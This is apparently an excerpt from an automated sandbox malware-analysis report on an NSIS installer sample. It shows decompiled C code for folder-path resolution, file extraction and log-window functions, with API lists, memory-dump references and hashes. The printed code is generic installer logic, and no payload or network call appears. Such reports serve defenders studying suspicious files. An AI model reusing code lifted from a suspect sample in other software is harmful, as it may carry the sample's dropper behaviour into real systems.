										__imp__CoTaskMemFree(_v8);
										__eflags = _v12;
										if(_v12 != 0) {
											goto L30;
										}
										goto L28;
									}
									__eflags = _a8;
									if(_a8 == 0) {
										goto L26;
									}
									_t54 =  *_t50( *0x42f428,  *(_t97 + _t96 * 4 - 0x18), 0, 0, _t87); // executed
									__eflags = _t54;
									if(_t54 == 0) {
										goto L30;
									}
									goto L26;
								}
								goto L30;
							}
							GetSystemDirectoryA(_t87, 0x400);
							goto L30;
						} else {
							E0040613E((_t77 & 0x0000003f) +  *0x42f458, __eflags, 0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t77 & 0x0000003f) +  *0x42f458, _t87, _t77 & 0x00000040); // executed
							__eflags =  *_t87;
							if( *_t87 != 0) {
								L31:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t87, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L33;
							}
							E004062EA(_t63, _t87, _t96, _t87, _v16);
							L30:
							__eflags =  *_t87;
							if( *_t87 == 0) {
								goto L33;
							}
							goto L31;
						}
					}
					__eflags =  *0x42f4de - 0x45a;
					if( *0x42f4de >= 0x45a) {
						goto L13;
					}
					__eflags = _t39 - 0x23;
					if(_t39 == 0x23) {
						goto L13;
					}
					__eflags = _t39 - 0x2e;
					if(_t39 == 0x2e) {
						goto L13;
					}
					_a8 = _a8 & 0x00000000;
					goto L14;
				}
				 *_t87 =  *_t87 & 0x00000000;
				if(_a4 == 0) {
					return _t37;
				}
				return E00406257(_a4, _t37);
			}


























                                                                                                                                                                              0x004062ea
                                                                                                                                                                              0x004062ea
                                                                                                                                                                              0x004062ea
                                                                                                                                                                              0x004062f0
                                                                                                                                                                              0x004062f5
                                                                                                                                                                              0x004062f7
                                                                                                                                                                              0x00406306
                                                                                                                                                                              0x00406306
                                                                                                                                                                              0x0040630e
                                                                                                                                                                              0x0040630f
                                                                                                                                                                              0x00406310
                                                                                                                                                                              0x00406311
                                                                                                                                                                              0x00406314
                                                                                                                                                                              0x0040631c
                                                                                                                                                                              0x0040631e
                                                                                                                                                                              0x00406324
                                                                                                                                                                              0x0040632f
                                                                                                                                                                              0x00406335
                                                                                                                                                                              0x00406335
                                                                                                                                                                              0x00406338
                                                                                                                                                                              0x00406338
                                                                                                                                                                              0x0040632f
                                                                                                                                                                              0x00406512
                                                                                                                                                                              0x00406512
                                                                                                                                                                              0x00406516
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00406345
                                                                                                                                                                              0x0040634b
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00406351
                                                                                                                                                                              0x00406352
                                                                                                                                                                              0x00406355
                                                                                                                                                                              0x00406358
                                                                                                                                                                              0x00406505
                                                                                                                                                                              0x0040650f
                                                                                                                                                                              0x00406511
                                                                                                                                                                              0x00406511
                                                                                                                                                                              0x00406507
                                                                                                                                                                              0x00406509
                                                                                                                                                                              0x0040650b
                                                                                                                                                                              0x0040650c
                                                                                                                                                                              0x0040650c
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00406505
                                                                                                                                                                              0x0040635e
                                                                                                                                                                              0x00406362
                                                                                                                                                                              0x00406372
                                                                                                                                                                              0x00406379
                                                                                                                                                                              0x0040637c
                                                                                                                                                                              0x00406384
                                                                                                                                                                              0x00406387
                                                                                                                                                                              0x0040638e
                                                                                                                                                                              0x0040638f
                                                                                                                                                                              0x00406392
                                                                                                                                                                              0x004064b2
                                                                                                                                                                              0x004064b5
                                                                                                                                                                              0x004064e5
                                                                                                                                                                              0x004064e8
                                                                                                                                                                              0x004064ed
                                                                                                                                                                              0x004064f1
                                                                                                                                                                              0x004064f1
                                                                                                                                                                              0x004064f6
                                                                                                                                                                              0x004064fc
                                                                                                                                                                              0x004064fe
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004064fe
                                                                                                                                                                              0x004064b7
                                                                                                                                                                              0x004064ba
                                                                                                                                                                              0x004064cf
                                                                                                                                                                              0x004064d6
                                                                                                                                                                              0x004064bc
                                                                                                                                                                              0x004064c3
                                                                                                                                                                              0x004064c3
                                                                                                                                                                              0x004064de
                                                                                                                                                                              0x004064e1
                                                                                                                                                                              0x004064aa
                                                                                                                                                                              0x004064ab
                                                                                                                                                                              0x004064ab
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004064e1
                                                                                                                                                                              0x00406398
                                                                                                                                                                              0x004063a1
                                                                                                                                                                              0x004063a2
                                                                                                                                                                              0x004063bf
                                                                                                                                                                              0x004063bf
                                                                                                                                                                              0x004063c6
                                                                                                                                                                              0x004063c6
                                                                                                                                                                              0x004063cd
                                                                                                                                                                              0x004063d1
                                                                                                                                                                              0x004063d1
                                                                                                                                                                              0x004063d2
                                                                                                                                                                              0x004063d4
                                                                                                                                                                              0x0040640d
                                                                                                                                                                              0x00406410
                                                                                                                                                                              0x00406420
                                                                                                                                                                              0x00406423
                                                                                                                                                                              0x0040642b
                                                                                                                                                                              0x00406431
                                                                                                                                                                              0x00406431
                                                                                                                                                                              0x00406490
                                                                                                                                                                              0x00406490
                                                                                                                                                                              0x00406492
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00406435
                                                                                                                                                                              0x0040643c
                                                                                                                                                                              0x0040643d
                                                                                                                                                                              0x0040643f
                                                                                                                                                                              0x00406459
                                                                                                                                                                              0x00406467
                                                                                                                                                                              0x0040646d
                                                                                                                                                                              0x0040646f
                                                                                                                                                                              0x0040648d
                                                                                                                                                                              0x0040648d
                                                                                                                                                                              0x0040648d
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x0040648d
                                                                                                                                                                              0x00406475
                                                                                                                                                                              0x0040647e
                                                                                                                                                                              0x00406481
                                                                                                                                                                              0x00406487
                                                                                                                                                                              0x0040648b
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x0040648b
                                                                                                                                                                              0x00406441
                                                                                                                                                                              0x00406444
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00406453
                                                                                                                                                                              0x00406455
                                                                                                                                                                              0x00406457
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00406457
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00406490
                                                                                                                                                                              0x00406418
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004063d6
                                                                                                                                                                              0x004063f1
                                                                                                                                                                              0x004063f6
                                                                                                                                                                              0x004063f9
                                                                                                                                                                              0x00406499
                                                                                                                                                                              0x00406499
                                                                                                                                                                              0x0040649d
                                                                                                                                                                              0x004064a5
                                                                                                                                                                              0x004064a5
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x0040649d
                                                                                                                                                                              0x00406403
                                                                                                                                                                              0x00406494
                                                                                                                                                                              0x00406494
                                                                                                                                                                              0x00406497
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00406497
                                                                                                                                                                              0x004063d4
                                                                                                                                                                              0x004063a4
                                                                                                                                                                              0x004063ad
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004063af
                                                                                                                                                                              0x004063b2
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004063b4
                                                                                                                                                                              0x004063b7
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004063b9
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004063b9
                                                                                                                                                                              0x0040651c
                                                                                                                                                                              0x00406526
                                                                                                                                                                              0x00406532
                                                                                                                                                                              0x00406532
                                                                                                                                                                              0x00000000

                                                                                                                                                                              APIs
                                                                                                                                                                              • GetSystemDirectoryA.KERNEL32 ref: 00406418
                                                                                                                                                                              • GetWindowsDirectoryA.KERNEL32(ExecToStack,00000400,?,Skipped: C:\Users\user\AppData\Local\Temp\nsb11EA.tmp\nsExec.dll,00000000,004053B0,Skipped: C:\Users\user\AppData\Local\Temp\nsb11EA.tmp\nsExec.dll,00000000), ref: 0040642B
                                                                                                                                                                              • SHGetSpecialFolderLocation.SHELL32(004053B0,0 v,?,Skipped: C:\Users\user\AppData\Local\Temp\nsb11EA.tmp\nsExec.dll,00000000,004053B0,Skipped: C:\Users\user\AppData\Local\Temp\nsb11EA.tmp\nsExec.dll,00000000), ref: 00406467
                                                                                                                                                                              • SHGetPathFromIDListA.SHELL32(0 v,ExecToStack), ref: 00406475
                                                                                                                                                                              • CoTaskMemFree.OLE32(0040A198), ref: 00406481
                                                                                                                                                                              • lstrcatA.KERNEL32(ExecToStack,\Microsoft\Internet Explorer\Quick Launch), ref: 004064A5
                                                                                                                                                                              • lstrlenA.KERNEL32(ExecToStack,?,Skipped: C:\Users\user\AppData\Local\Temp\nsb11EA.tmp\nsExec.dll,00000000,004053B0,Skipped: C:\Users\user\AppData\Local\Temp\nsb11EA.tmp\nsExec.dll,00000000,00000000,00422E48,7620EA30), ref: 004064F7
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                                                                                              • String ID: 0 v$ExecToStack$H.B0 v$Skipped: C:\Users\user\AppData\Local\Temp\nsb11EA.tmp\nsExec.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                              • API String ID: 717251189-1308106946
                                                                                                                                                                              • Opcode ID: a2f56f6d0f1162f5eaac14cd87f867bf1e8ae6f6d2175ce0c13bbb87bd24daf5
                                                                                                                                                                              • Instruction ID: b52c447f78294e1834a117c6ffbc2f7508752916544efe1487e33f4ad7b91c7d
                                                                                                                                                                              • Opcode Fuzzy Hash: a2f56f6d0f1162f5eaac14cd87f867bf1e8ae6f6d2175ce0c13bbb87bd24daf5
                                                                                                                                                                              • Instruction Fuzzy Hash: 53612270900110AFDF20AF24DD90B7E3BA8AB15318F52403FE903BA2D1C67C99A6DB5D
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 00401759 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147stringtimeCOMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              C-Code - Quality: 61%
                                                                                                                                                                              			E00401759(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				CHAR* _t83;
				void* _t85;

				_t75 = __ebx;
				_t82 = E00402C39(0x31);
				 *(_t85 - 8) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
				_t33 = E00405C56(_t82);
				_push(_t82);
				_t83 = "ExecToStack";
				if(_t33 == 0) {
					lstrcatA(E00405BE9(E00406257(_t83, "C:\\Users\\hardz\\Pictures\\Cellekammeraten\\PRVEBALLONS\\Omstigningens\\Lektionskatalogets1")), ??);
				} else {
					E00406257();
				}
				E00406535(_t83);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E004065CE(_t83);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E00405DC5(_t83);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E00405DEA(_t83, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 0xc) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E00405378(0xffffffe2,  *(_t85 - 8));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x42f4a8;
						goto L32;
					} else {
						E00406257(0x40ac38, 0x430000);
						E00406257(0x430000, _t83);
						E004062EA(_t75, 0x40ac38, _t83, "C:\Users\hardz\AppData\Local\Temp\nsb11EA.tmp\nsExec.dll",  *((intOrPtr*)(_t85 - 0x14)));
						E00406257(0x430000, 0x40ac38);
						_t62 = E0040596D("C:\Users\hardz\AppData\Local\Temp\nsb11EA.tmp\nsExec.dll",  *(_t85 - 0x28) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x42f4a8 =  &( *0x42f4a8->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(_t83);
								_push(0xfffffffa);
								E00405378();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00405378(0xffffffea,  *(_t85 - 8)); // executed
				 *0x42f4d4 =  *0x42f4d4 + 1;
				_push(_t75);
				_push(_t75);
				_push( *(_t85 - 0xc));
				_push( *((intOrPtr*)(_t85 - 0x20)));
				_t43 = E00403143(); // executed
				 *0x42f4d4 =  *0x42f4d4 - 1;
				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x1c) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 0xc), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 0xc)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E004062EA(_t75, _t80, _t83, _t83, 0xffffffee);
					} else {
						E004062EA(_t75, _t80, _t83, _t83, 0xffffffe9);
						lstrcatA(_t83,  *(_t85 - 8));
					}
					_push(0x200010);
					_push(_t83);
					E0040596D();
					goto L29;
				}
				goto L33;
			}

















                                                                                                                                                                              0x00401759
                                                                                                                                                                              0x00401760
                                                                                                                                                                              0x00401769
                                                                                                                                                                              0x0040176c
                                                                                                                                                                              0x0040176f
                                                                                                                                                                              0x00401774
                                                                                                                                                                              0x00401775
                                                                                                                                                                              0x0040177c
                                                                                                                                                                              0x00401798
                                                                                                                                                                              0x0040177e
                                                                                                                                                                              0x0040177f
                                                                                                                                                                              0x0040177f
                                                                                                                                                                              0x0040179e
                                                                                                                                                                              0x004017a8
                                                                                                                                                                              0x004017a8
                                                                                                                                                                              0x004017ac
                                                                                                                                                                              0x004017af
                                                                                                                                                                              0x004017b4
                                                                                                                                                                              0x004017b6
                                                                                                                                                                              0x004017b8
                                                                                                                                                                              0x004017bd
                                                                                                                                                                              0x004017bd
                                                                                                                                                                              0x004017c8
                                                                                                                                                                              0x004017c8
                                                                                                                                                                              0x004017d9
                                                                                                                                                                              0x004017db
                                                                                                                                                                              0x004017db
                                                                                                                                                                              0x004017dc
                                                                                                                                                                              0x004017dc
                                                                                                                                                                              0x004017df
                                                                                                                                                                              0x004017e2
                                                                                                                                                                              0x004017e5
                                                                                                                                                                              0x004017e5
                                                                                                                                                                              0x004017ec
                                                                                                                                                                              0x004017fb
                                                                                                                                                                              0x00401800
                                                                                                                                                                              0x00401803
                                                                                                                                                                              0x00401806
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00401808
                                                                                                                                                                              0x0040180b
                                                                                                                                                                              0x00401865
                                                                                                                                                                              0x0040186a
                                                                                                                                                                              0x004015b0
                                                                                                                                                                              0x004027c8
                                                                                                                                                                              0x004027c8
                                                                                                                                                                              0x00402ac5
                                                                                                                                                                              0x00402ac8
                                                                                                                                                                              0x00402ac8
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x0040180d
                                                                                                                                                                              0x00401813
                                                                                                                                                                              0x0040181e
                                                                                                                                                                              0x0040182b
                                                                                                                                                                              0x00401836
                                                                                                                                                                              0x0040184c
                                                                                                                                                                              0x0040184c
                                                                                                                                                                              0x0040184f
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00401855
                                                                                                                                                                              0x00401855
                                                                                                                                                                              0x00401856
                                                                                                                                                                              0x00401873
                                                                                                                                                                              0x00402ace
                                                                                                                                                                              0x00402ace
                                                                                                                                                                              0x00402ace
                                                                                                                                                                              0x00401858
                                                                                                                                                                              0x00401858
                                                                                                                                                                              0x00401859
                                                                                                                                                                              0x00401492
                                                                                                                                                                              0x0040238f
                                                                                                                                                                              0x0040238f
                                                                                                                                                                              0x0040238f
                                                                                                                                                                              0x00401856
                                                                                                                                                                              0x0040184f
                                                                                                                                                                              0x00402ad0
                                                                                                                                                                              0x00402ad4
                                                                                                                                                                              0x00402ad4
                                                                                                                                                                              0x00401883
                                                                                                                                                                              0x00401888
                                                                                                                                                                              0x0040188e
                                                                                                                                                                              0x0040188f
                                                                                                                                                                              0x00401890
                                                                                                                                                                              0x00401893
                                                                                                                                                                              0x00401896
                                                                                                                                                                              0x0040189b
                                                                                                                                                                              0x004018a1
                                                                                                                                                                              0x004018a5
                                                                                                                                                                              0x004018a7
                                                                                                                                                                              0x004018af
                                                                                                                                                                              0x004018bb
                                                                                                                                                                              0x004018a9
                                                                                                                                                                              0x004018a9
                                                                                                                                                                              0x004018ad
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004018ad
                                                                                                                                                                              0x004018c4
                                                                                                                                                                              0x004018ca
                                                                                                                                                                              0x004018cc
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004018d2
                                                                                                                                                                              0x004018d2
                                                                                                                                                                              0x004018d5
                                                                                                                                                                              0x004018ed
                                                                                                                                                                              0x004018d7
                                                                                                                                                                              0x004018da
                                                                                                                                                                              0x004018e3
                                                                                                                                                                              0x004018e3
                                                                                                                                                                              0x004018f2
                                                                                                                                                                              0x004018f7
                                                                                                                                                                              0x0040238a
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x0040238a
                                                                                                                                                                              0x00000000

                                                                                                                                                                              APIs
                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,00000000,ExecToStack,C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\Lektionskatalogets1,00000000,00000000,00000031), ref: 00401798
                                                                                                                                                                              • CompareFileTime.KERNEL32(-00000014,?,ExecToStack,ExecToStack,00000000,00000000,ExecToStack,C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\Lektionskatalogets1,00000000,00000000,00000031), ref: 004017C2
                                                                                                                                                                                • Part of subcall function 00406257: lstrcpynA.KERNEL32(0000000B,0000000B,00000400,00403556,ARBEJDSTILLADELSER Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 00406264
                                                                                                                                                                                • Part of subcall function 00405378: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsb11EA.tmp\nsExec.dll,00000000,00422E48,7620EA30,?,?,?,?,?,?,?,?,?,0040329E,00000000,?), ref: 004053B1
                                                                                                                                                                                • Part of subcall function 00405378: lstrlenA.KERNEL32(0040329E,Skipped: C:\Users\user\AppData\Local\Temp\nsb11EA.tmp\nsExec.dll,00000000,00422E48,7620EA30,?,?,?,?,?,?,?,?,?,0040329E,00000000), ref: 004053C1
                                                                                                                                                                                • Part of subcall function 00405378: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsb11EA.tmp\nsExec.dll,0040329E,0040329E,Skipped: C:\Users\user\AppData\Local\Temp\nsb11EA.tmp\nsExec.dll,00000000,00422E48,7620EA30), ref: 004053D4
                                                                                                                                                                                • Part of subcall function 00405378: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsb11EA.tmp\nsExec.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsb11EA.tmp\nsExec.dll), ref: 004053E6
                                                                                                                                                                                • Part of subcall function 00405378: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040540C
                                                                                                                                                                                • Part of subcall function 00405378: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405426
                                                                                                                                                                                • Part of subcall function 00405378: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405434
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsb11EA.tmp$C:\Users\user\AppData\Local\Temp\nsb11EA.tmp\nsExec.dll$C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\Lektionskatalogets1$ExecToStack
                                                                                                                                                                              • API String ID: 1941528284-548342492
                                                                                                                                                                              • Opcode ID: 640f8c9f2fa92019e4f64945458d40341364eca15fdd8eefa9a37344c26f4be6
                                                                                                                                                                              • Instruction ID: 09a7a28129c88a40a5f98fd7d2104631a28ae03f955191848f4916981dc93f0e
                                                                                                                                                                              • Opcode Fuzzy Hash: 640f8c9f2fa92019e4f64945458d40341364eca15fdd8eefa9a37344c26f4be6
                                                                                                                                                                              • Instruction Fuzzy Hash: 2E41B572900615BBCB207BB5CD45DAF3679EF05369F60823FF422B20E1D67C8A518A6D
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 00405378 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73stringwindowCOMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 641 405378-40538d 642 405443-405447 641->642 643 405393-4053a5 641->643 644 4053b0-4053bc lstrlenA 643->644 645 4053a7-4053ab call 4062ea 643->645 647 4053d9-4053dd 644->647 648 4053be-4053ce lstrlenA 644->648 645->644 650 4053ec-4053f0 647->650 651 4053df-4053e6 SetWindowTextA 647->651 648->642 649 4053d0-4053d4 lstrcatA 648->649 649->647 652 4053f2-405434 SendMessageA * 3 650->652 653 405436-405438 650->653 651->650 652->653 653->642 654 40543a-40543d 653->654 654->642
                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                              			E00405378(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x42ec04; // 0x20378
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x42f4d4;
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E004062EA(0, _t39, 0x42a070, 0x42a070, _a4);
					}
					_t26 = lstrlenA(0x42a070);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x42ebe8, 0x42a070); // executed
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x42a070;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0); // executed
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52); // executed
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0); // executed
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x42a070)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x42a070, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

















                                                                                                                                                                              0x0040537e
                                                                                                                                                                              0x0040538a
                                                                                                                                                                              0x0040538d
                                                                                                                                                                              0x00405393
                                                                                                                                                                              0x0040539f
                                                                                                                                                                              0x004053a2
                                                                                                                                                                              0x004053a5
                                                                                                                                                                              0x004053ab
                                                                                                                                                                              0x004053ab
                                                                                                                                                                              0x004053b1
                                                                                                                                                                              0x004053b9
                                                                                                                                                                              0x004053bc
                                                                                                                                                                              0x004053d9
                                                                                                                                                                              0x004053dd
                                                                                                                                                                              0x004053e6
                                                                                                                                                                              0x004053e6
                                                                                                                                                                              0x004053f0
                                                                                                                                                                              0x004053f9
                                                                                                                                                                              0x00405405
                                                                                                                                                                              0x0040540c
                                                                                                                                                                              0x00405410
                                                                                                                                                                              0x00405413
                                                                                                                                                                              0x00405426
                                                                                                                                                                              0x00405434
                                                                                                                                                                              0x00405434
                                                                                                                                                                              0x00405438
                                                                                                                                                                              0x0040543a
                                                                                                                                                                              0x0040543d
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x0040543d
                                                                                                                                                                              0x004053be
                                                                                                                                                                              0x004053c6
                                                                                                                                                                              0x004053ce
                                                                                                                                                                              0x004053d4
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004053d4
                                                                                                                                                                              0x004053ce
                                                                                                                                                                              0x004053bc
                                                                                                                                                                              0x00405447

                                                                                                                                                                              APIs
                                                                                                                                                                              • lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsb11EA.tmp\nsExec.dll,00000000,00422E48,7620EA30,?,?,?,?,?,?,?,?,?,0040329E,00000000,?), ref: 004053B1
                                                                                                                                                                              • lstrlenA.KERNEL32(0040329E,Skipped: C:\Users\user\AppData\Local\Temp\nsb11EA.tmp\nsExec.dll,00000000,00422E48,7620EA30,?,?,?,?,?,?,?,?,?,0040329E,00000000), ref: 004053C1
                                                                                                                                                                              • lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsb11EA.tmp\nsExec.dll,0040329E,0040329E,Skipped: C:\Users\user\AppData\Local\Temp\nsb11EA.tmp\nsExec.dll,00000000,00422E48,7620EA30), ref: 004053D4
                                                                                                                                                                              • SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsb11EA.tmp\nsExec.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsb11EA.tmp\nsExec.dll), ref: 004053E6
                                                                                                                                                                              • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040540C
